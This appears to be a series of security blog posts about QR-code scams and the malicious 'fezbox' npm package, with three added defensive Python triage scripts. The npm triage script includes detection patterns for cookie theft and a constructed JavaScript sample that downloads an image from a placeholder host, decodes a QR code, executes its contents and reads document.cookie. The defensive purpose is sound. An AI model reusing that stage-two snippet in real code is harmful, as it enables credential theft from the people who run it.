I love it when people come up to me and say they are “wicked paranoid” about QR codes. I have been trying to educate people on the risks of QR codes for years, and it gives me satisfaction to know I have kept that person from becoming a victim of a malicious QR code. QR codes have become ubiquitous since the pandemic, starting with menuless menus. I ask for a paper menu, and surprisingly, most restaurants still have them.

Here’s another example to bolster my case. Bleeping Computer reported that the Socket Threat Research Team has identified “a malicious package, ‘fezbox’, published to npmjs.com, the world’s largest open-source registry for JavaScript and Node.js developers….which contains hidden instructions to fetch a JPG image containing a QR code, which it can then further process to run a second-stage obfuscated payload as a part of the attack.” What does this mean? Nobody has to scan anything. Once the package is installed, it downloads the image itself, decodes the QR code in it, and runs the obfuscated payload the code carried. That payload reads the browser’s cookies through document.cookie, and if it finds a username and password among them, it sends those credentials out to a server the threat actor controls. The threat actor then has the victim’s credentials and can use them to access the victim’s data, including sensitive and proprietary data. One caveat worth knowing: a cookie set with the HttpOnly flag cannot be read through document.cookie at all, which is exactly why session cookies and anything else that carries a credential should have that flag.

According to Bleeping Computer, “we have seen countless cases of QR codes deployed in social engineering scams…but these require human intervention…scanning the code and being led to a phishing website, for example…but this week’s discovery by Socket shows yet another twist on QR codes: a compromised machine can use them to talk to its command-and-control (C2) server in a way that, to a proxy or network security tool, may look like nothing more than ordinary image traffic.” Because the threats from malicious QR codes are still not well known, I anticipate that threat actors will keep finding new uses for them, whether as carriers for phishing, smishing and credential-stealing links or, as here, as a covert channel for delivering code, and it will be hard to get out in front of the risk. One way to mitigate is to never scan a public QR code, never scan a QR code in an email, and be wicked paranoid about any QR code presented to you.
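To make the fezbox chain concrete for anyone who reviews dependencies, here is a small static triage script. It is an added example written for this post, not Socket’s tooling and not the fezbox code. It looks through a package’s JavaScript for the pieces the report describes (fetch an image, decode a QR code, run what it contains, read document.cookie, look for a username and password) and flags a file only when most of the chain is present. The indicator patterns, the decoder library names, the flagging threshold and the sample package are all assumptions.

```python
"""Static triage of an npm package for the behaviour described above.

Added example, not Socket's tooling and not the fezbox code. The indicators are
an assumption drawn from the page's description: fetch an image, decode a QR code
from it, run a second-stage payload, read document.cookie, look for credentials.
The library names in the qr_decoder pattern are common decoders, listed as an
assumption; extend the list for your environment.
"""
import re
from typing import Dict, List

# Each indicator is one link of the chain the page describes.
INDICATORS = {
    "reads_document_cookie": re.compile(r"document\s*\.\s*cookie"),
    "fetches_image": re.compile(
        r"\b(?:fetch|axios(?:\.get)?|https?\.get)\s*\(\s*[^)]*\.(?:jpe?g|png|gif)\b", re.I),
    "qr_decoder": re.compile(
        r"""(?:require\(|from\s+)\s*['"](?:jsqr|qrcode-reader|@zxing/library|zxing)['"]""", re.I),
    "dynamic_code_exec": re.compile(r"\b(?:eval|new\s+Function)\s*\("),
    "credential_cookie_names": re.compile(r"""['"](?:username|password|passwd)['"]""", re.I),
}

# Flag a file that shows this many links of the chain, or the two that matter most
# (cookie theft plus executing downloaded code).
FLAG_THRESHOLD = 3


def triage_package(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each flagged file to the indicators found in it.

    `files` maps a path inside the package tarball to its source text.
    """
    flagged: Dict[str, List[str]] = {}
    for path, source in files.items():
        hits = [name for name, rx in INDICATORS.items() if rx.search(source)]
        if len(hits) >= FLAG_THRESHOLD or {"reads_document_cookie", "dynamic_code_exec"} <= set(hits):
            flagged[path] = hits
    return flagged


# Constructed sample package, not fezbox: one benign helper and one file that
# wires the whole chain together the way the page describes it.
SAMPLE_PACKAGE = {
    "lib/strings.js": "export const pad = (s, n) => s.padStart(n);\n",
    "lib/qr.js": (
        'const decode = require("jsqr");\n'
        "async function stage2() {\n"
        '  const img = await fetch("https://cdn.example.invalid/logo.jpg");\n'
        "  const code = decode(await img.arrayBuffer());\n"
        "  new Function(code.data)();  // run whatever the QR code carried\n"
        "}\n"
        'const jar = document.cookie.split(";");\n'
        'const user = jar.find((c) => c.trim().startsWith("username"));\n'
    ),
}

if __name__ == "__main__":
    for path, hits in triage_package(SAMPLE_PACKAGE).items():
        print(f"{path}: {', '.join(hits)}")
```

To run it on a real package, extract the tarball from `npm pack <name>` and feed the `.js` files in as the dictionary. Hits are leads, not verdicts: a legitimate QR library will trip one or two indicators on its own, which is why the threshold is the whole chain rather than any single link of it.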

We have repeatedly warned our readers about malicious QR codes and their use by threat actors.

Threat actors are now mailing unsolicited packages dressed up as gifts and using these codes inside them. Upon opening the package, recipients find a note with instructions to scan a QR code to identify the sender. The code leads to a website that asks for credentials in order to get more information about the “gift” and instructions for returns. The website may also ask for credit card or other personal information.

It has become such a problem that the Federal Trade Commission (FTC) has issued a scam alert.

According to the FTC:

“If you scanned the QR code and entered your credentials, like your username and password, into a website, change your password right away. Create a strong password that is hard to guess, and turn on two-factor authentication.

If you’re concerned someone has your personal information, get your free credit report at AnnualCreditReport.com. Look for signs that someone is using your information, like accounts in your name you don’t recognize. (You can get a free credit report every week.)

Also review your credit card bills and bank account statements and look for transactions you didn’t make. And consider taking other steps to protect your identity, like freezing your credit or putting a fraud alert on your credit report.

If you think someone stole your identity, report it, and get a personal recovery plan at IdentityTheft.gov.”

This week is Identity Theft Protection Week. Sign up for the free resources provided by the Federal Trade Commission at ftc.gov and stay safe.

The recent increase in smishing and vishing schemes is prompting me to remind readers of schemes designed to trick users into providing credentials to perpetrate fraud. We have previously written on phishing, smishing, vishing, and QRishing schemes to increase awareness about these methods of intrusion.

HC3 recently warned the health care sector about vishing schemes designed to impersonate employees in order to access financial systems. See previous blog on this topic here.

The City of New York was recently forced to take its payroll system down for more than a week after a smishing scheme designed to steal employees’ pay. The attack targeted users of the city’s Automated Personnel System Employee Self Service portal. The threat actor sent employees fake text messages about multi-factor authentication, each with a link to a page that collected their self-service credentials, including usernames, passwords, and copies of driver’s licenses. With that information the threat actor could log in to the payroll system and redirect employees’ pay to accounts the threat actor controlled.

Phishing, vishing, smishing, and QRishing continue to be successful ways for threat actors to perpetrate fraud. Applying a healthy dose of paranoia whenever you receive any request for credentials, whether by email, phone, text or through a QR code is warranted and wise.

I hate to say, “I told you so,” but I did. I have repeatedly warned against scanning QR codes. Following the pandemic and scanning QR codes at restaurants, people have become very comfortable with scanning QR codes, don’t think twice about it, and don’t fully grasp the risk associated with a malicious QR code. Find previous blog posts pertaining to QR codes here.

It is important to understand that a QR code is just a link (or other data) printed as a pattern that your phone reads for you. Just like a malicious link or attachment in an email or text (which we have been trained not to click on), a QR code can point to a malicious site or a malicious download, with the same results, and with the added problem that you cannot read the link before you scan it. Unfortunately, threat actors are doing just that.

According to Dark Reading, threat actors recently “sent more than 1,000 emails armed with malicious QR codes aimed at stealing Microsoft credentials” to an energy company and to organizations in other industries, including manufacturing, insurance, technology, and financial services.

The email phishing campaign with malicious QR codes was discovered by Cofense. According to Cofense, “This campaign makes use of a PDF or image file attachment with the QR code embedded into it… This makes it easier for the emails to bypass Secure Email Gateways.” The campaign is ongoing and “spreading quickly.” Note, too, that the phone an employee scans the code with is usually outside the company’s email and web controls altogether. The bottom line is to train employees not to scan QR codes received by email or text, and to alert the IT department if one is received. Everyone should treat QR codes with a high degree of suspicion, just like a suspicious text or email.
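One way to catch this shape of message at the mailbox, as an added example and not Cofense’s or any vendor’s detection: the script below never decodes a QR code. It scores a message for the combination the campaign depends on, an image or PDF attached to a short note that tells the reader to scan it, and holds anything that scores high enough for a human to look at. The lure words, the word-count cut-off and both sample messages are constructed assumptions.

```python
"""Inbox-side triage for QR lures carried in image or PDF attachments.

Added example, not Cofense's detection and not any vendor's product. It does
not decode the QR code; it scores the shape of the message the campaign relies
on: a picture or PDF attached to a short note telling the reader to scan it.
LURE_WORDS, SHORT_BODY_WORDS and the sample messages are assumptions.
"""
import email
from email import policy
from email.message import EmailMessage

# Substring matches, so this is a heuristic ("scan" also hits "scandal").
LURE_WORDS = ("scan", "qr code", "authenticator", "mfa", "voicemail", "docusign", "payroll")
QR_CARRIER_TYPES = {"image/png", "image/jpeg", "image/gif", "application/pdf"}
SHORT_BODY_WORDS = 60  # a real business mail usually says more than this


def triage_message(raw: bytes) -> dict:
    """Score one RFC 5322 message; hold it for review at score >= 3."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body_part = msg.get_body(preferencelist=("plain", "html"))
    body = body_part.get_content().lower() if body_part else ""

    carriers = [
        (part.get_filename() or "(unnamed)", part.get_content_type())
        for part in msg.walk()
        if part.get_content_type() in QR_CARRIER_TYPES
    ]
    lures = [w for w in LURE_WORDS if w in body]
    short_body = len(body.split()) < SHORT_BODY_WORDS

    score = 0
    if carriers:
        score += 1  # something a QR code could be printed in
    if carriers and short_body:
        score += 1  # the attachment *is* the message
    if lures:
        score += 1  # familiar bait
    if "scan" in lures or "qr code" in lures:
        score += 1  # explicit instruction to scan
    return {
        "subject": msg["Subject"],
        "carriers": carriers,
        "lures": lures,
        "short_body": short_body,
        "score": score,
        "hold_for_review": score >= 3,
    }


def build_sample(lure: bool) -> bytes:
    """Constructed messages: a 'missed voicemail' QR lure, or an ordinary mail."""
    m = EmailMessage()
    m["From"] = "notifications@mail.example.invalid"
    m["To"] = "user@corp.example.invalid"
    if lure:
        m["Subject"] = "You have (1) new voicemail"
        m.set_content("Scan the QR code in the attached image to listen to your voicemail.")
        fake_png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed bytes, not a real image
        m.add_attachment(fake_png, maintype="image", subtype="png", filename="voicemail.png")
    else:
        m["Subject"] = "Minutes from Tuesday"
        m.set_content(
            "Hi all, the notes from Tuesday's meeting are below. "
            "Action items are listed at the end; let me know if I missed anything."
        )
    return m.as_bytes()


if __name__ == "__main__":
    for flag in (True, False):
        print(triage_message(build_sample(flag)))
```

In a real deployment the held message goes to a quarantine queue, and the analyst who reviews it decodes the image in a sandbox rather than with a phone. The score is deliberately blind to the sender: the campaigns above used compromised, perfectly reputable accounts.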

The FBI’s Internet Crime Complaint Center (IC3) recently issued a warning alerting consumers that scammers are using malicious QR Codes to reroute unsuspecting customers to malicious sites to try to steal their data.

Also known as QRishing, [view related post] criminals are taking advantage of our familiarity with QR codes, after using them at restaurants and other establishments during the pandemic, to commit crimes. The criminals encode a link to a malicious site in the QR code, so that scanning it sends the user there, and then attempt to get the user to provide personal information, financial information or other data that the criminals can use to perpetrate fraud or identity theft.

A QR code that points to a malicious site is no different from a malicious link or attachment in a phishing email or a smishing text, except that you cannot read it before you open it. Consumers are not as alert to QR codes as we have become to malicious emails and texts.

Hence, the alert from IC3. IC3 is warning consumers to check and re-check any URL generated by a QR code and to be cautious about using QR codes for any form of payment. Most phone camera apps show the decoded address before opening it; read it every time, and stop if it is shortened, misspelled, or not the site you expected.

QR codes should be viewed as suspiciously as emails and texts. Be cautious when asked to scan a QR code, and refuse to provide any type of personal information or financial information after scanning one.
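Here is what “check and re-check the URL” can look like in practice, as an added example that is not IC3’s text and not a published tool. It takes the string a scanner app decoded and returns every reason not to open it. It goes a little beyond IC3’s advice in one respect: it also classifies payment and other non-web schemes, because codes printed on letters and posters carry those too. The shortener and brand lists, the example URLs and the thresholds are assumptions, and nothing here fetches the URL.

```python
"""Triage of the text decoded from a QR code, before anything is opened.

Added example, not IC3's guidance verbatim and not a published tool. A QR code
only carries data, usually a URL, so this is the check IC3 asks for, done on
that string. SHORTENERS, BRANDS and PAYMENT_SCHEMES are assumed lists; extend
them for your environment. Nothing here fetches the URL.
"""
import ipaddress
from urllib.parse import urlsplit

WEB_SCHEMES = {"http", "https"}
PAYMENT_SCHEMES = {"bitcoin", "ethereum", "litecoin"}  # assumed list
DANGEROUS_SCHEMES = {"javascript", "data", "file", "vbscript"}
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com", "is.gd", "cutt.ly", "rb.gy"}  # assumed list
# brand keyword -> registrable domains that really are that brand (assumed, incomplete)
BRANDS = {
    "microsoft": {"microsoft.com", "microsoftonline.com", "live.com", "office.com"},
    "docusign": {"docusign.com", "docusign.net"},
    "paypal": {"paypal.com"},
}


def registrable(host: str) -> str:
    """Crude eTLD+1 (last two labels). Enough for the brand check; not a PSL lookup."""
    return ".".join(host.split(".")[-2:])


def triage_decoded(data: str) -> dict:
    """Return every reason not to open the decoded string; empty means no red flags."""
    text = data.strip()
    parts = urlsplit(text)
    scheme = parts.scheme.lower()
    host = (parts.hostname or "").lower()
    reasons = []

    if scheme in PAYMENT_SCHEMES:
        reasons.append(f"payment request ({scheme}:); do not pay via a QR code you did not generate")
    elif scheme in DANGEROUS_SCHEMES:
        reasons.append(f"{scheme}: scheme has no legitimate use in a printed or mailed code")
    elif scheme not in WEB_SCHEMES:
        # App-specific schemes (device-linking codes for messaging apps, etc.) land here.
        reasons.append(f"unexpected scheme {scheme or '(none)'}; know exactly which app will handle it")
    else:
        if scheme == "http":
            reasons.append("plain http: anything you type here travels unencrypted")
        if not host:
            reasons.append("web URL without a host")
        if parts.username is not None:
            reasons.append("user@ before the host: the real site is whatever follows the @")
        try:
            ipaddress.ip_address(host)
            reasons.append("host is a raw IP address")
        except ValueError:
            pass
        if any(label.startswith("xn--") for label in host.split(".")):
            reasons.append("punycode host: may be a look-alike of a familiar name")
        if registrable(host) in SHORTENERS:
            reasons.append("URL shortener hides the real destination")
        for brand, legit in BRANDS.items():
            if brand in host and registrable(host) not in legit:
                reasons.append(f"mentions {brand} but is not a {brand} domain")
        try:
            if parts.port not in (None, 80, 443):
                reasons.append(f"non-standard port {parts.port}")
        except ValueError:
            reasons.append("unparsable port")
        if host.count(".") >= 4:
            reasons.append("deeply nested subdomains")

    return {"input": text, "scheme": scheme, "host": host,
            "reasons": reasons, "safe_to_open": not reasons}


if __name__ == "__main__":
    for sample in (  # constructed inputs; the bitcoin address is not a real one
        "https://www.microsoft.com/",
        "https://microsoft.com.login-verify.example/auth",
        "http://203.0.113.5/login",
        "bitcoin:bc1qexampleaddress?amount=0.5",
        "https://bit.ly/3abc",
    ):
        verdict = triage_decoded(sample)
        print("OK  " if verdict["safe_to_open"] else "FLAG", sample)
        for reason in verdict["reasons"]:
            print("    -", reason)
```

An empty reason list is “no red flags,” not “safe”: a brand-new domain with a valid certificate passes every check here, which is why the advice above is to refuse to enter credentials or payment details after scanning at all.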

We have previously alerted you to vishing and smishing schemes [view related post]. A new scheme, using QR codes, is called QRishing or quishing. According to security company Abnormal, between September 15 and October 13, 2021, it identified a new way for hackers to try to get around security measures put in place to keep users from clicking on malicious links or attachments. The phishing campaign they detected was designed to collect Microsoft credentials using QR codes.

According to Abnormal, the threat actors used compromised email accounts to send users QR codes dressed up as missed voicemail notifications. Although the threat actors were unsuccessful in getting users to scan the QR codes, the point is that attackers are getting increasingly creative and hiding malicious links behind QR codes, which became widely used by restaurants and other establishments during COVID. Many people had never heard of a QR code or used one until COVID hit, and no one seems particularly concerned about pointing a phone at a QR code when instructed to do so.

The tip here is to be cautious of QR codes, especially in an email or text, and specifically if someone is asking you to scan one or it is tied to a missed voicemail message. A QR code in an email is just an image, so an email security system that inspects the links in a message may not see the link at all; that is exactly what the attacker is counting on, so that the message reaches your inbox and gives you the chance to scan it and hand over your Microsoft credentials. The new mantra is don’t click on suspicious links or attachments, and don’t scan suspicious QR codes.

On November 24, 2025, the Cybersecurity & Infrastructure Security Agency (CISA) issued an alert titled “Spyware Allows Cyber Threat Actors to Target Users of Messaging Applications,” which outlines how “multiple cyber threat actors” are “leveraging commercial spyware to target users of mobile messaging applications.”

The threat actors “use sophisticated targeting and social engineering techniques to deliver spyware and gain unauthorized access to a victim’s messaging app, facilitating the deployment of additional malicious payloads that can further compromise the victim’s mobile device.”

According to the alert, the threat actors use tactics including:

  • Phishing and malicious device-linking QR codes to compromise victim accounts and link them to actor-controlled devices;
  • Zero-click exploits, which do not require direct action from the device user; and
  • Impersonation of messaging app platforms, such as Signal and WhatsApp.

The threat actors target “high-value individuals, such as current and former high-ranking government, military and political officials, as well as civil society organizations (CSOs) and individuals across the United States, Middle East and Europe.” CISA “strongly encourages messaging app users to review” its updated Mobile Communications Best Practice Guide and Mitigating Cyber Threats with Limited Resources: Guidance for Civil Society. For Signal and WhatsApp users in particular, the practical check is the app’s linked-devices list: a device-linking QR code only needs to be scanned once to mirror your conversations to a device the attacker controls, so review that list and remove anything you do not recognize.

In a recent blog post, KnowBe4 reported that it has “uncovered an emerging advanced phishing campaign targeting Microsoft 365 users globally to steal their credentials. The attackers are wielding a powerful new tool that’s completely changing the game for cybercriminals—turning what used to be complex, technical phishing setups into simple one-click launches that can bypass certain technical controls.”

The tool is called “Quantum Route Redirect.” KnowBe4 has observed attacks using Quantum Route Redirect since August 2025, and a new phishing kit is for sale that “comes with a pre-configured set up and phishing domains that significantly simplifies a once technically complex campaign flow, further ‘democratizing’ phishing for less skilled cybercriminals.”

The threat actors start the campaign with a phishing email using:

  • Docusign and other service agreement impersonation;
  • Payroll impersonation;
  • Payment notification emails;
  • “Missed voicemail messages”; and
  • QR code phishing (quishing)

Once the victim clicks the link (or scans the QR code) in the message, the request passes through a domain running Quantum Route Redirect, which forwards the victim to a credential-harvesting page; the stolen credentials are then used to attack the victim’s company. As of the date of the blog post, KnowBe4 had identified approximately 1,000 domains hosting the tool.

One important observation is that there will soon be an upgrade for the kit “that will include QR code generation capabilities to enable Quantum Route Redirect users to significantly scale quishing attacks linked to the campaign.” We have been warning readers about malicious QR code attacks for several years, and these attacks continue to be effectively used by threat actors. KnowBe4’s prediction that threat actors will be able to “significantly scale” QRishing attacks using the Quantum Route Redirect tool emphasizes the continued need to educate users on the risk of QR codes, and on the technology behind them, so users will understand never to scan a QR code presented in an email.

The KnowBe4 blog post outlines the details of how threat actors are effectively using Quantum Route Redirect, which is helpful in developing user education materials. It is a good reminder to all of us to continue to be vigilant about suspicious requests contained in emails.

Everyone thinks they can spot a phish. Whether it is an email, an SMS text, or a QR code, people have an overinflated view of their ability to detect them.

A new summary by KnowBe4, “What Makes People Click?” provides an insightful review and shows that people still click when curiosity gets the best of them.

According to the summary of top-clicked phishing tests between January and March 2025, phishes impersonating HR or IT are the most successful. People were more likely to interact with links related to internal team topics, open PDFs, HTML files, and .doc Word files and continue to be vulnerable to impersonation of trusted company brands. The companies most likely to be impersonated as part of a successful phishing campaign are Microsoft, LinkedIn, the company the victim works for, Google, and Okta.

And then there are QR codes. Everyone makes fun of me for constantly warning about QR codes, and I am grateful to KnowBe4 for having my back on this one. Its summary illustrates that users continue to be duped into scanning malicious QR codes. The top three successful QR scams are QR codes related to the company’s new drug and alcohol policy, a DocuSign for review and signing, and a happy birthday message from Workday. Please take these statistics to heart and beware of these and similar scams. Think twice before clicking on that Happy Birthday message from Workday.

I frequently conduct employee education sessions and carefully follow KnowBe4’s insights. It always has its finger on the pulse and provides practical solutions in real-time. Review its 1st quarter summary, which is jam-packed with useful information for yourself and your users. 

We have educated our readers about phishing, smishing, QRishing, and vishing scams, and now we’re warning you about what we have dubbed “snailing.” Yes, believe it or not, threat actors have gone retro and are using snail mail to try to extort victims. TechRadar is reporting that, according to GuidePoint Security, an organization received several letters in the mail, allegedly from the BianLian cybercriminal gang, stating:

“I regret to inform you that we have gained access to [REDACTED] systems and over the past several weeks have exported thousands of data files, including customer order and contact information, employee information with IDs, SSNs, payroll reports, and other sensitive HR documents, company financial documents, legal documents, investor and shareholder information, invoices, and tax documents.”

The letter alleges that the recipient’s network “is insecure and we were able to gain access and intercept your network traffic, leverage your personal email address, passwords, online accounts and other information to social engineer our way into [REDACTED] systems via your home network with the help of another employee.” The threat actors then demand $250,000-$350,000 in Bitcoin within ten days. They even offer a QR code in the letter that directs the recipient to the Bitcoin wallet.

It’s comical that the letters have a return address of an actual Boston office building.

GuidePoint Security says the letters and attacks mentioned in them are fake and are inconsistent with BianLian’s ransom notes. Apparently, these days, even threat actors get impersonated. Now you know—don’t get scammed by a snailing incident.